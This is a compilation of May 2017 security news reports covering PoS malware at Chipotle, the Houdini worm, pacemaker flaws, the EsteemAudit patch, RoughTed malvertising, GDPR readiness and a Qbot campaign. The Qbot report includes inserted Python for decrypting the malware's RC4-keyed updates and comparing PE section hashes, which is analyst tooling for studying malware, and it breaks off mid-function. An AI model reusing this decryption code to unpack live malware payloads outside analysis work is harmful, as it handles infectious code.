Chipotle Mexican Grill fast-food chain notified customers of a PoS malware breach
27.5.2017 securityaffairs Virus

The fast-food chain Chipotle notified customers of a security breach: hackers compromised its point-of-sale terminals to steal payment card data.
The Mexican grill fast-food chain Chipotle has notified customers of a data breach; hackers infected its point-of-sale terminals with malware designed to steal payment card data.

The malicious code infected systems in 47 states and Washington earlier this year, between March 24 and April 18.

The list of affected Chipotle restaurants is available here.

“The investigation identified the operation of malware designed to access payment card data from cards used on point-of-sale (POS) devices at certain Chipotle restaurants between March 24, 2017 and April 18, 2017.” reads the data breach notification published by the company. “The malware searched for track data (which sometimes has cardholder name in addition to card number, expiration date, and internal verification code) read from the magnetic stripe of a payment card as it was being routed through the POS device. There is no indication that other customer information was affected.”


The company highlighted that not all locations were breached; customers can check a specific location at the following address:

https://www.chipotle.com/security#security

Customers who paid at the compromised stores should stay vigilant and review any transaction on their bank accounts involving their payment card.

The company confirmed that it has removed the malicious code from the infected systems.

“During the investigation we removed the malware, and we continue to work with cyber security firms to evaluate ways to enhance our security measures. In addition, we continue to support law enforcement’s investigation and are working with the payment card networks so that the banks that issue payment cards can be made aware and initiate heightened monitoring.” reads the statement.

PoS system attacks are very common. This week Target, the US retail giant that suffered one of the most severe PoS system attacks, entered a settlement with the US Attorneys General and agreed to pay $18.5 million over the 2013 data breach.


Experts tracked a German hacker behind the spread of the Houdini worm on Pastebin
27.5.2017 securityaffairs Virus

Security experts at Recorded Future have tracked a German hacker responsible for propagating the Houdini worm through Pastebin sites.
A German hacker who goes online by the moniker Vicswors Baghdad is responsible for the propagation of the Houdini malware on Pastebin sites.

According to the experts at Recorded Future, the same threat actor also appears to be the author of an open source ransomware variant called MoWare H.F.D.

Experts at Recorded Future observed three distinct spikes in malicious Visual Basic scripts posted on paste sites, in August, October, and March 2017.


Most of the scripts are used to spread the Houdini worm, a threat that first appeared in 2013 and was updated in 2016.

“In early March 2017, we began to notice an increasing number of malicious VBScripts posted to paste sites. The majority of these VBScripts appeared to be Houdini. Houdini is a VBScript worm that first appeared in 2013 and was updated in 2016.” states the analysis published by Recorded Future. “The individual(s) reusing this Houdini VBScript are continually updating with new command and control servers. After further defining our search criteria, we isolated the Houdini scripts and quickly identified three distinct spikes around August, October, and March of this year.”

Recorded Future discovered 213 malicious posts on paste sites involving a single domain with 105 subdomains, and the experts collected 190 hashes.

The domains and subdomains belong to a dynamic DNS provider, and attribution through the paste accounts was impossible because the threat actors published the VBScript for the Houdini worm from guest accounts.

However, the experts were able to determine the registrant of one domain, microsofit[.]net: the name is “Mohammed Raad,” the associated email is “vicsworsbaghdad@gmail.com,” and the listed country is “Germany.”

Googling the above information, the researchers discovered a Facebook profile using the identical details. According to the profile, Mohammed Raad is a member of a German cell of Anonymous and uses Vicswors Baghdad as an alias.

The researchers also highlighted that the Facebook profile includes a recent conversation related to the MoWare H.F.D ransomware.


“The Facebook profile displays a recent conversation pertaining to an open source ransomware called “MoWare H.F.D”. It appears that they are studying, testing, and possibly configuring a ransomware.” continues the analysis.

“Upon further inspection of the screenshot posted on the “vicsworsbaghdad” Facebook profile, we noticed that the ransomware being configured is an open source version available by commenting on the creator’s YouTube video. An account “Vicswors Baghdad” commented asking where he can find the file to download, to which the developer commented that they sent a private message. The account “Vicswors Baghdad” uses the same email “vicsworsbaghdad@gmail.com” as the registration of microsofit[.]net.”

Further details, including the threat actor profile, are available in the post published by Recorded Future.


Organizations Concerned About Medical Device Attacks: Study

27.5.2017 securityweek Cyber

Many manufacturers and healthcare delivery organizations (HDOs) are concerned about medical device attacks, but only a few have taken significant steps to address the threat, according to a study commissioned by electronic design automation solutions provider Synopsys.

The study, based on a survey of 550 individuals conducted by the Ponemon Institute, shows that 67 percent of medical device makers and 56 percent of HDOs believe an attack on the medical devices they build or use is likely to occur in the next 12 months.

In fact, roughly one-third of respondents said they were aware of cyber incidents that had a negative impact on patients, including inappropriate therapy or treatment delivery, ransomware attacks, denial-of-service (DoS) attacks, and hijacking of medical devices.

On the other hand, only 17 percent of device manufacturers and 15 percent of HDOs have taken significant steps to prevent attacks. Roughly 40 percent on both sides admitted that they haven’t done anything to prevent attacks.

Only 25 percent of device makers and 38 percent of HDOs are confident that the security mechanisms built inside devices can adequately protect patients and the clinicians who use these systems.

While mobile devices help clinicians be more efficient, approximately half of respondents believe that their use in hospitals and other healthcare organizations significantly increases security risks.

A majority of respondents believe securing medical devices is very difficult. The survey showed that many focus on security requirements instead of more efficient practices, such as security testing throughout the development lifecycle, code review, and dynamic testing.

The study shows that more than half of device manufacturers and HDOs blame the presence of vulnerable code on lack of quality assurance and testing procedures, while nearly 50 percent also blame the rush-to-release pressure on the development team, accidental coding errors, and lack of training on secure coding practices.

The study shows that 36 percent of manufacturers and 45 percent of HDOs do not test devices. Some of those that do test have admitted finding vulnerabilities and even malware.

While medical device manufacturers are most concerned about hacker attacks and the challenges posed by securing new medical technologies, service providers are more concerned about keeping up with regulatory requirements, and the medical industry’s lack of protection for patients and users.

When it comes to budget, a majority believe a serious hacking incident affecting medical devices would likely lead to a budget increase. A significant percentage of respondents also believe new regulations would influence budget.

Budget influence factors


Researchers Release Patch for NSA-linked "EsteemAudit" Exploit

27.5.2017 securityweek BigBrothers
Security researchers at enSilo have released a patch to keep vulnerable systems protected from a recently released Windows exploit allegedly used by the National Security Agency (NSA)-linked Equation Group.

Dubbed EsteemAudit, this exploit targets a remote desktop protocol (RDP) bug and can be abused to move laterally within a compromised organization’s network, as well as to infect victims with ransomware or backdoors, or to exfiltrate sensitive information.

The exploit might not be as popular as the EternalBlue exploit, which fueled large infections such as WannaCry or Adylkuzz, but it could prove as devastating.

EsteemAudit was made public last month when the hacking group known as the Shadow Brokers decided to release a new set of exploits and tools allegedly stolen from the NSA-linked Equation Group last year. Soon after, Microsoft said the vulnerabilities had been patched in March.

The hackers initially put the tools up for auction, but decided to release some of them for free after failing to attract buyers. Last week, the Shadow Brokers announced plans to launch a subscription service and share more exploits to members for a monthly fee.

Unlike EternalBlue, which affects a variety of Windows versions, EsteemAudit only works on Windows XP and Windows Server 2003, which supposedly limits its overall impact. However, this also means that an official patch is unlikely to arrive from Microsoft, as it no longer offers support for these platform iterations.

Because of that, enSilo decided to release a persistent patch for these systems and keep users safe from attacks possibly leveraging the exploit. The decision was fueled by the fact that a large number of machines continue to use Windows XP and Server 2003, the researchers say.

“Upon login for each session, Windows will create a new instance of winlogon. The patch will be loaded into winlogon.exe (only if it is an RDP session) to perform in memory patching (hotpatching) of EsteemAudit. Any attempt to use EsteemAudit to infect the patched machine will inevitably fail,” enSilo explains.

Installing this patch, however, doesn’t render Windows XP or Server 2003 systems fully secure, as hundreds of other vulnerabilities impacting them still exist and will never be patched. This patch resolves only the vulnerability exploited by EsteemAudit and works on both x86 and x64 platform versions.

The patch is available for download on enSilo’s website and is installed by an installation program after accepting the terms of usage. Uninstallation is supported by signaling an event (which will remove the patch in memory) and unregistering the patch from loading into subsequent RDP sessions.

“The patch for Windows XP and Server 2003 supports silent installation and does not require a reboot, which helps users avoid the required downtime typically associated with patch installations. Upon patching, any attempt to use an EsteemAudit exploit to infect a patched machine will inevitably fail,” the researchers say.


Large Malvertising Campaign Delivers Array of Payloads

27.5.2017 securityweek Virus
A malvertising campaign that has been active for more than a year is using fingerprinting to target users with a variety of payloads, Malwarebytes security researchers warn.

Dubbed RoughTed, this large malvertising operation peaked in March 2017, with its domains accumulating over half a billion visits in the past 3 months alone. Unique to it is the fact that it has a broad scope, ranging from scams to exploit kits, and that it delivers payloads based on user’s operating system, browser, and geolocation.

The campaign also uses effective techniques to triage visitors and bypass ad-blockers, which explains the large success it has seen so far. RoughTed’s operators have been using the Amazon cloud infrastructure, particularly the Content Delivery Network (CDN) and multiple ad redirections from several ad exchanges, the security firm says.

With traffic coming from thousands of publishers, some of which are ranked in Alexa’s top 500 websites, the campaign blended in and made it more difficult to identify the source of malvertising, Malwarebytes’ Jérôme Segura reveals.

Upon initial detection, the campaign was redirecting to the Magnitude exploit kit, but started redirecting to the RIG exploit kit just days later. Segura then identified the same pattern on a hundred other domains, most of which he says were purchased through registrar EvoPlus in small batches, with a new .ru or .ua email address each time.

While analyzing the traffic for the RoughTed campaign, Segura discovered that the bulk of it was coming from video or file sharing sites closely intertwined with URL shorteners. These sites enjoy high traffic but have low standards when it comes to quality and safety of online advertising, Segura points out.

The campaign was also associated with an ad code script from advertising company Ad-Maven, which webmasters knowingly integrated into personal websites for monetization purposes. The script contains an algorithm to generate future Amazon S3 URLs, though buckets are created only for the next 3-5 days.

The code also stands out due to its fingerprinting functionality and the use of a technique called ‘canvas fingerprinting’. “The point is to profile users with great granularity and identify those that may be cheating the system by lying about their browser or geolocation,” the researcher explains.

What’s more, the redirections to RoughTed domains were found to happen even when ad-blockers such as Adblock Plus, uBlock Origin or AdGuard were used. In an incident involving Google Chrome, the researcher found that the browser hijacking took place as soon as the user clicked anywhere on the first visited page.

“This malvertising campaign is quite diverse and no matter what your operating system or browser are, you will receive a payload of some kind. Perhaps this should be something for publishers to have a deep hard look at, knowing what they may be subjecting their visitors to if they decide to use those kinds of adverts,” the researcher says.

As part of the campaign, users were tricked with a fake Flash Player update that targets Mac, or with a bogus Java update for Windows, which instead is laced with adware. Bogus Chrome extensions are also part of it, leveraging the popularity of the browser, along with undesired redirections to iTunes/app store, tech support scams, or surveys and other scams.

The RoughTed campaign also redirected to exploit kits, mainly when it came to users in the US and Canada, but also those in the U.K., Italy, Spain, and Brazil. Used exploit kits included RIG, which in turn served the Ramnit banking Trojan, along with Magnitude, which eventually dropped the Cerber ransomware onto compromised systems.


G7 Demands Internet Giants Crack Down on Extremist Content

27.5.2017 securityweek BigBrothers
Taormina, Italy - The G7 nations on Friday demanded action from internet providers and social media firms against extremist content online, vowing to step up their fight against terrorism after the Manchester attack.

"The G7 calls for Communication Service Providers and social media companies to substantially increase their efforts to address terrorist content," Britain, the United States and their G7 partners said in a statement.

"We encourage industry to act urgently in developing and sharing new technology and tools to improve the automatic detection of content promoting incitement to violence, and we commit to supporting industry efforts in this vein including the proposed industry-led forum for combating online extremism," they said.

Elders at the Manchester mosque where the bomber sometimes worshipped have insisted that they preached a message of peace.

It has been suggested that he may well have been radicalized online by accessing content that is freely available from the likes of the Islamic State group.

"Make no mistake: the fight is moving from the battlefield to the internet," Prime Minister Theresa May told her G7 colleagues.

The G7 also vowed a collective effort to track down and prosecute foreign fighters dispersing from theaters of conflict such as Syria.

One prosecution was recently brought against such a fighter in Turkey, and Britain now wants help from local authorities for more prosecutions in Lebanon, Jordan and Iraq, a British government spokesperson said as the G7 countries met in Sicily.

The stepped-up cooperation comes amid fears that the Manchester bomber had been to Syria after visiting his parents' homeland of Libya.

"It is vital we do more to cooperate with our partners in the region to step up returns and prosecutions of foreign fighters," May said as she chaired a discussion on counter-terrorism in the Sicilian resort of Taormina.

"This means improving intelligence-sharing, evidence gathering and bolstering countries' police and legal processes."

European authorities are increasingly concerned about the threat posed by foreign fighters who went to join the Islamic State group but are now dispersing as the group comes under pressure on the battlefield.

According to a senior British government source, May urged the G7 countries to share police expertise and border security methods with countries where foreign fighters travel through or fight in.

Names and nationalities of foreign fighters should be shared to help their identification by different countries as they cross borders.

"When our allies find evidence, such as video or papers, of illegal activity involving foreign fighters, for example a Brit in a conflict zone, they should pass that to our authorities. It may help prosecute foreign fighters when they return," the source said.


Draft Hacking Back Bill Gets Modifications Prior to Imminent Introduction

26.5.2017 securityweek Hacking
Rep. Tom Graves (R-Ga.) has released an updated version (PDF) of his draft Active Cyber Defense Certainty (ACDC) Act, incorporating feedback from the business community, academia and cybersecurity policy experts. "I look forward to continuing the conversation and formally introducing ACDC in the next few weeks," he said yesterday.

The original discussion draft was released in March 2017.

ACDC is designed to amend the existing Computer Fraud and Abuse Act (CFAA). CFAA, enacted in 1986, currently prohibits individuals from taking any defensive actions other than preventative actions; that is, cyber defenders are only legally allowed to defend passively. ACDC would allow controlled 'active' defense -- something often called, somewhat misleadingly, 'hacking back' -- by excluding prosecution for the exempted actions under the CFAA.

The modifications now introduced are largely designed to tighten control and avoid collateral damage. For example, entities using active-defense techniques will need to report to the FBI. "A victim who uses an active cyber defense measure... must notify the FBI National Cyber Investigative Joint Task Force prior to using the measure."

Similarly, modifications make it clear that active defense restrictions against causing physical injury include financial injury; and provide additional safeguards for 'intermediate computers'. The latter term is defined as "a person or entity's computer that is not under the ownership or control of the attacker but has been used to launch or obscure the origin of the persistent cyber-attack."

These intermediate computers have always been considered the weak point in any form of hacking back -- it is not easy for anyone to be certain of the precise source of an attack, leading to the possibility that active-defense measures could be launched against an innocent target.

National Security Agency and Cyber Command head Admiral Mike Rogers is one of those with such concerns. "My concern is," he said during testimony before a House Armed Services subcommittee on Tuesday, "be leery of putting more gunfighters out in the street in the Wild West. As an individual tasked with protecting our networks, I'm thinking to myself -- we've got enough cyber actors out there already."

Perhaps in recognition of the inherent difficulties in such an Act, Graves has also introduced a sunset clause: "The exclusion from prosecution created by this Act shall expire 2 years after the date of enactment of this Act."

"Although ACDC allows a more active role in cyber defense," says an associated statement released yesterday, "it protects privacy rights by prohibiting vigilantism, forbidding physical damage or destruction of information on anyone else's computer, and preventing collateral damage by constraining the types of actions that would be considered active defense."


Survey Shows Disparity in GDPR Preparedness and Concerns

26.5.2017 securityweek Privacy
The European General Data Protection Regulation will take effect in exactly one year from today. It will affect any company that does business with the EU, whether that company is based in Europe or elsewhere (such as the US). While there have been many surveys indicating that affected firms are far from prepared, there are few that highlight the geographic disparity in readiness.

One Year Out: Views on GDPR (PDF), conducted by Vanson Bourne for Varonis, is particularly detailed. It surveyed 500 IT decision makers in organizations with more than 1,000 employees in the US (200), the UK (100), Germany (100) and France (100). Unlike many such surveys, it includes the raw data, allowing readers to dig deep into areas of interest or concern.

Unsurprisingly, given other surveys, the headline result is that 75% of respondents "face serious challenges in being compliant with the EU GDPR by 25th May 2018." This result is consistent across all four nations; but those who strongly agree range from 15% in the UK (the lowest) to 25% (the highest) in the US.

The cause of this disparity may be found in senior management's attitude towards GDPR. Overall, 42% of companies do not view compliance by the deadline as a priority. Thirteen percent of firms 'strongly agree' with this -- but the detail ranges from just 6% in the UK to 19% in the US (France and Germany are equal at 10%).

It is tempting to suggest that this is influenced by history: the UK regulator has traditionally been 'business-friendly', allowing companies to be more relaxed towards data protection than counterparts in France and Germany. US companies (apart from the major tech industries such as Google, Facebook and Microsoft), have little experience of European regulators.

But while the survey may indicate a lack of urgency at the management level, the respondents themselves indicate serious concern over the potential effect of GDPR. Overall, 75% of respondents believe that fines imposed for breaching regulations could cripple some organizations. Here, US concerns (81%) are above average, with France being the least concerned at 64%. It would appear that US practitioners are more concerned about GDPR than are their managers.

The survey also provides detail on what aspects of GDPR are most concerning. Not surprisingly, the erasure right (the right-to-be-forgotten) in Article 17 tops the list at 55% overall. Somewhat surprisingly given the apparent link between this and the American constitutional right to freedom of speech, the US respondents were the least concerned at 48%. Equally surprising, UK concern was by far the highest at 71%.

The second biggest concern is the requirement for processing activities, contained in Article 30; that is, visibility into and control over who has access to the data. Overall concern was steady at 52%, with regional variations limited to the lowest at 50% (UK) and the highest at 53% (US).

"What's most worrying about the findings," comments Matt Lock, director of sales engineers at Varonis, "is that one in four organizations doesn't have a handle on where its sensitive data resides. These companies are likely to have a nasty wake-up call in one year's time. If they don't have this fundamental insight into where sensitive data sits within their organizations and who can and is accessing it, then their chances of getting to first base with the regulations are miniscule and they are putting themselves firmly at the front of the queue for fines.”

The concern showing the greatest disparity is over data protection by design (Article 25). The least concern comes from France at 35%, with the highest from the US at 55% (this is the highest of all concerns for the US respondents). It seems to reflect a general concern that GDPR might impinge on innovation -- with the highest concern coming from perhaps the most entrepreneurial nation.

It would be wrong, however, to think that the respondents have only negative thoughts and worries about GDPR. Thirty-six percent of respondents believe it will be very beneficial for both consumers and organizations. This, however, ranges from a very low 12% in the UK to an encouraging 47% in the US. In purely business terms, 57% of UK respondents believe it will prove troublesome for organizations, while only 36% of US respondents think the same.

The top benefit for private citizens is that their personal data will be better protected (54%). The UK (61%) and the US (59%) lead France (45%) and Germany (47%) in this. The order is reversed, however, over whether GDPR will make it less likely that PII will be passed to third parties. The UK (24%) and the US (32%) are behind both France (35%) and Germany (36%). Confirming these views, very few respondents could see no benefits from GDPR -- and most of those seem to be in the UK (11%). Only 5% of US organizations hold a similar view.

A particularly interesting section of the report deals with expected outcomes from the GDPR, with wide variations on which regulator is expected to be the most stringent. Overall, Germany tops the list at 76%, with German respondents in the lead at 85%. The UK is second overall at 57% -- which could be surprising given the UK regulator's soft historical approach and the UK government's insistence that it will implement GDPR in as business-friendly a manner as possible. This view is distorted, however, by the UK and US respondents' score at 76% each. France (35%) and Germany (24%) are far less confident that the UK regulator will be rigorous.

Ninety-two percent of respondents suspect a particular industry will be singled out as an example in the event of a breach. Banking is seen as the most likely at 26% overall. This figure is distorted by the UK response at 52%. Both France and Germany individually believe that any example will more likely come from the technology and telecommunications industry.

A high number of respondents (82%) also believe that a particular country will be singled out if one of their organizations is in breach of GDPR. The overall favorite is the UK at 23% -- but this is distorted by the UK respondents (48%) who are perhaps concerned with the after effects of Brexit. Noticeably, only 2% of French and 11% of German respondents have a similar view.

Nevertheless, 68% of respondents believe that a UK company (as opposed to the UK in general) will be singled out and punished because of Brexit. This belief is most strong in the US (77%) and the UK (70%), and less so, but still high, in France (58%) and Germany (57%).

What this survey shows above all is that while there is a general lack of preparedness for GDPR among most organizations, specific concerns and expectations can vary widely between the different nations. The level of detail provided goes far beyond many similar surveys, and allows individual readers to dig deeper into specific areas. The value in this is that by evaluating other countries' and organizations' concerns, individual readers can rate their own preparedness.


Endpoint Security Firm Tanium Raises $100 Million

26.5.2017 securityweek Security
Emeryville, CA-based endpoint security and systems management firm Tanium announced on Thursday that it has raised $100 million through the sale of common stock.

The latest funding round was led by TPG Growth and it brought in a new investor. The $100 million raised through the issuance of common stock – previous funding rounds offered only preferred stock – brings the company’s value to $3.75 billion.

Part of the proceeds have been used to repurchase shares from David Hindawi, co-founder and executive chairman of Tanium, to allow him to fund his charity projects. The rest will be used to provide liquidity to early employees and investors, and for general corporate purposes.


With this funding round, Tanium has raised a total of $407 million. The company reported a revenue growth of more than 100% last year, and it claims to have brought on board nearly 100 new enterprise customers. Clients include U.S. government agencies, 12 of the top 15 banks, and six of the top 10 retailers.

The company’s plans for the future include expansion in the EMEA and APAC regions, establishing a strong presence in the media and manufacturing sectors, further investment into IT operations products and modules, and growth in existing industries.

“Tanium is unique in our industry. In contrast to the cybersecurity-only companies, we provide an endpoint platform that allows communication for massive numbers of assets in a way enterprises have never had before, which is useful across not only security but also operations issues in IT,” said Tanium CEO Orion Hindawi.

“Because of that breadth of offering, our investors see Tanium having longevity and potential that exceeds the typical cybersecurity landscape, and we will work hard to continue proving them right by driving our platform further into both security and operations with each passing quarter,” he added.

Last month, Hindawi published an open letter addressing accusations that the company exposed a California hospital’s network during sales demos, and reports of a toxic staff relations culture.


Russia's Disinformation Efforts Hit 39 Countries: Researchers

26.5.2017 securityweek BigBrothers
Russia's campaign of cyberespionage and disinformation has targeted hundreds of individuals and organizations from at least 39 countries along with the United Nations and NATO, researchers said Thursday.

A report by the Citizen Lab at the University of Toronto revealed the existence of "a major disinformation and cyber espionage campaign with hundreds of targets in government, industry, military and civil society," lead researcher Ronald Deibert said.

The findings suggest that the cyber attacks on the 2016 presidential campaign of Hillary Clinton -- which US intelligence officials have attributed to Russia -- were just the tip of the iceberg.

Citizen Lab researchers said the espionage has targeted not only government, military and industry targets, but also journalists, academics, opposition figures, and activists.

Notable targets, according to the report, have included a former Russian prime minister, former high-ranking US officials, members of cabinets from Europe and Eurasia, ambassadors, high ranking military officers and chief executives of energy companies.

In a blog post, Deibert said the Russian-directed campaign follows a pattern of "phishing" attacks to obtain credentials of targets, and carefully "tainted" leaks that mix real and false information to create confusion around the true facts.

"Russia has a long history of experience with what is known as 'dezinformatsiya,' going back even to Soviet times," Deibert said.

"Tainted leaks, such as those analyzed in our report, present complex challenges to the public. Fake information scattered amongst genuine materials -- 'falsehoods in a forest of facts'... is very difficult to distinguish and counter, especially when it is presented as a salacious 'leak' integrated with what otherwise would be private information."

Deibert said the researchers had no "smoking gun" that links the campaign to a particular government agency but added that "our report nonetheless provides clear evidence of overlap with what has been publicly reported by numerous industry and government reports about Russian cyber espionage."

Citizen Lab said one of the targets was US journalist David Satter, who has written extensively on corruption in Russia.

Satter's stolen e-mails were "selectively modified," and then "leaked" to give the false impression that he was part of a CIA-backed plot to discredit Russian President Vladimir Putin, the report said.

Similar leak campaigns targeted officials from Afghanistan, Armenia, Austria, Cambodia, Egypt, Georgia, Kazakhstan, Kyrgyzstan, Latvia, Peru, Russia, Slovakia, Slovenia, Sudan, Thailand, Turkey, Ukraine, Uzbekistan and Vietnam, according to the report.

UN officials and military personnel from more than a dozen countries were also targets, Citizen Lab said.

"Our hope is that in studying closely and publishing the details of such tainted leak operations, our report will help us better understand how to recognize and mitigate them," Deibert said.


Thousands of Third-Party Library Flaws Put Pacemakers at Risk

26.5.2017 securityweek Vulnerability
Researchers have conducted a detailed analysis of pacemaker systems from four major vendors and discovered many potentially serious vulnerabilities.

The fact that implantable cardiac devices such as pacemakers and defibrillators are vulnerable to hacker attacks has been known for years, and while steps have been taken to address issues, security experts still report finding flaws in these products.

WhiteScope, a company founded by Billy Rios, one of the first security researchers to analyze medical devices, recently conducted an analysis of the implantable cardiac device ecosystem architecture and implementation interdependencies, with a focus on pacemakers.

Pacemaker vulnerabilities

The analysis covered home monitoring systems, implantable devices, pacemaker programmers, and the patient support networks of four vendors. Researchers investigated each type of device and the communications between them.

Tests conducted on devices acquired from eBay showed that reverse engineering their firmware is made easy by the fact that many of them use commercial, off-the-shelf microprocessors.

In the case of home monitoring devices, researchers discovered data sheets publicly available on the Internet, allowing attackers to determine how they work and how they can be manipulated. Firmware reverse engineering is also made easy by the lack of packing, obfuscation and encryption.

Debugging functionality present in implanted devices also exposes firmware. Malicious actors could leverage these features to gain privileged access to home monitoring devices and the pacemaker programmers used by physicians to diagnose and program the actual cardiac devices.

WhiteScope has analyzed four pacemaker programmers and found that they use more than 300 third-party libraries. Of these components, 174 are known to have a total of more than 8,000 vulnerabilities.

“Despite efforts from the FDA to streamline routine cybersecurity updates, all programmers we examined had outdated software with known vulnerabilities,” Rios said in a blog post. “We believe that this statistic shows that the pacemaker ecosystem has some serious challenges when it comes to keeping systems up-to-date. No one vendor really stood out as having a better/worse update story when compared to their competitors.”

In some cases, researchers found unencrypted patient data stored on the programmers, including SSNs, names, phone numbers and medical information. Since these programmers typically use removable storage drives, it’s easy for a local attacker to mount the drive and extract the entire file system.

Another potential problem is the fact that programmers do not require any type of authentication for programming implantable cardiac devices.

The list of security holes found by experts in home monitoring devices includes the failure to map the firmware to protected memory, firmware updates not digitally signed or protected against man-in-the-middle (MitM) attacks, hardcoded credentials, unsecured external USB connections, and the usage of universal authentication tokens for pairing with the implanted device.

The vendors have not been named and the details of the vulnerabilities found by WhiteScope have not been disclosed to the public, but they have been reported to ICS-CERT, which will likely alert affected companies.


Nigerians Sentenced to Prison in U.S. Over Massive Fraud Scheme

26.5.2017 securityweek Crime
Three Nigerian nationals have been handed prison sentences totaling 235 years by a U.S. court for their role in a massive international online scheme that involved romance scams, identity theft, fraud and money laundering.

The suspects, extradited to the United States from South Africa in July 2015, are Oladimeji Seun Ayelotan, 30, who was sentenced to 95 years in prison, Rasaq Aderoju Raheem, 31, who was sentenced to 115 years, and Femi Alexander Mewase, 45, who received a 25-year sentence.

They were found guilty in early 2017 of committing mail fraud, wire fraud, credit card fraud, identity theft, and theft of government property. Two of them were also found guilty of conspiracy to commit bank fraud and money laundering.

U.S. authorities have charged 21 individuals in this case, including from Nigeria, South Africa, Wisconsin, California and New York. Eleven members of the conspiracy have been sentenced, including Teslim Olarewaju Kiriji, a 30-year-old Nigerian man believed to be one of the leaders of the conspiracy. Kiriji was sentenced to 20 years in prison, while the others received 10 years or less. Many of the remaining suspects have already pleaded guilty to various charges.

According to the Department of Justice, the defendants have been involved in Internet scams since at least 2001, with intended losses totaling tens of millions of dollars.

The scheme often started with a romance scam targeting U.S. citizens, who were tricked into believing that they were in a romantic relationship with a persona made up by the scammers.

Once they gained the victim’s trust, the perpetrators asked them to send money or help carry out various activities, such as laundering money via Western Union and MoneyGram, cashing counterfeit checks, and reshipping items purchased with stolen credit cards. The scammers also used stolen personal information to take control of bank accounts.

Authorities have published a list of email addresses and names used in this operation, urging other potential victims to come forward.


Qbot Infects Thousands in New Campaign

26.5.2017 securityweek BotNet
A recent distribution campaign resulted in thousands of machines being infected with the Qbot malware, Cylance security researchers warn.

Qbot, which is also known as Qakbot or Quakbot, has been around since 2009, but multiple layers of obfuscation, server-side polymorphism and periodic improvements allow it to remain a persistent threat.

The malware is known for its credential stealing functionality and the ability to spread through network shares, but also includes backdoor capabilities. For two weeks in February last year, the threat managed to ensnare over 50,000 computers worldwide into a botnet. In July, a SentinelOne report on the Furtim-related SFG malware tied Qbot to a fast-flux proxy-based network called Dark Cloud or Fluxxy.

What’s unclear regarding the newly observed Qbot outbreak is how the malware managed to infect such a large number of machines in a short period of time. Most probably, Cylance says, updated exploit kits helped with the distribution.

The core functionality of Qbot has remained fairly consistent over the years, and the polymorphic nature of the threat helped it evade detection. Focusing on this aspect allowed the researchers to discover how often the executable code is modified.

The same as with previously observed samples, the malware continues to configure a scheduled task to request updates, with one command set to run on a weekly basis. The payload received from the server is encrypted, and “the first 20 bytes serve as the RC4 key to decrypt the data,” the security researchers say.
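As an added illustration of the update format described above (this is not Cylance's code or the malware's own routine), the following Python splits a constructed sample blob into its 20-byte RC4 key prefix and the ciphertext that follows it; the key, the fake executable and the helper that builds the blob are all made up for the example.

```python
import hashlib


def rc4_crypt(key: bytes, data: bytes) -> bytes:
    """Plain RC4: key-scheduling over the key, then the keystream XORed with data.
    RC4 is symmetric, so the same call both encrypts and decrypts."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    s = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm (KSA)
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                         # pseudo-random generation (PRGA)
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


KEY_LEN = 20  # per the article: the first 20 bytes of the payload are the RC4 key


def decrypt_update(blob: bytes) -> bytes:
    """Split a downloaded update into key prefix and ciphertext, then decrypt."""
    if len(blob) <= KEY_LEN:
        raise ValueError("blob too short to hold a %d-byte key plus data" % KEY_LEN)
    return rc4_crypt(blob[:KEY_LEN], blob[KEY_LEN:])


def looks_like_pe(data: bytes) -> bool:
    """Sanity check an analyst runs on the result: a Windows executable starts with 'MZ'."""
    return data[:2] == b"MZ"


def build_sample_update(key: bytes, plaintext: bytes) -> bytes:
    """Constructed blob in the described layout (for testing; hypothetical, not the real packer)."""
    if len(key) != KEY_LEN:
        raise ValueError("key must be exactly %d bytes" % KEY_LEN)
    return key + rc4_crypt(key, plaintext)


if __name__ == "__main__":
    # Constructed sample: a fake 'executable' and a 20-byte key derived from a label.
    sample_key = hashlib.sha1(b"constructed-sample-key").digest()   # SHA-1 digest is 20 bytes
    sample_exe = b"MZ" + b"\x90" * 62 + b"constructed payload"
    blob = build_sample_update(sample_key, sample_exe)
    recovered = decrypt_update(blob)
    print("decrypted looks like a PE:", looks_like_pe(recovered))   # True
```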

By creating a script to send HTTP requests to each of the three URLs the malware itself receives updates from, the security researchers discovered that files with a unique hash would be supplied every 10 minutes. They also managed to collect a total of 140 unique files supplied by the server over a period of 24 hours.

“All 141 downloaded files were 32-bit Windows executables. Across the 141 files, all have unique compile timestamps, and the earliest one occurred on May 15, 2017,” the researchers say.

Analyzing two files with the same import hash but with different file hashes revealed that, of nine PE sections each of them contains (.text, .code, .rdata, .data, .CRT, .exp, .code (again), .rsc, and .reloc), all section hashes match except those for .text, .rdata, and .data.
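The per-section comparison described above, as an added example that is not part of the original article or of Cylance's tooling: a minimal PE section-table parser hashes each section's raw bytes and reports which sections changed between two samples. The two sample files, their section contents and their timestamps are constructed here; the parser keys sections by index as well as name so that duplicate names (two .code sections, as in the Qbot samples) are handled.

```python
import hashlib
import struct

COFF_FMT = "<HHIIIHH"      # Machine, NumberOfSections, TimeDateStamp, SymTab, NumSyms, SizeOfOptionalHeader, Characteristics
SECT_FMT = "<8sIIIIIIHHI"  # Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, ..., Characteristics


def section_hashes(pe: bytes):
    """Return (compile timestamp, {(index, name): sha256 of the section's raw bytes})."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]          # offset of the PE header
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    _, nsect, timestamp, _, _, opt_size, _ = struct.unpack_from(COFF_FMT, pe, e_lfanew + 4)
    table = e_lfanew + 4 + struct.calcsize(COFF_FMT) + opt_size  # section table follows the optional header
    hashes = {}
    for idx in range(nsect):
        fields = struct.unpack_from(SECT_FMT, pe, table + idx * struct.calcsize(SECT_FMT))
        name = fields[0].rstrip(b"\0").decode("ascii", errors="replace")
        raw_size, raw_ptr = fields[3], fields[4]
        if raw_ptr + raw_size > len(pe):
            raise ValueError("section %s points outside the file" % name)
        hashes[(idx, name)] = hashlib.sha256(pe[raw_ptr:raw_ptr + raw_size]).hexdigest()
    return timestamp, hashes


def changed_sections(pe_a: bytes, pe_b: bytes):
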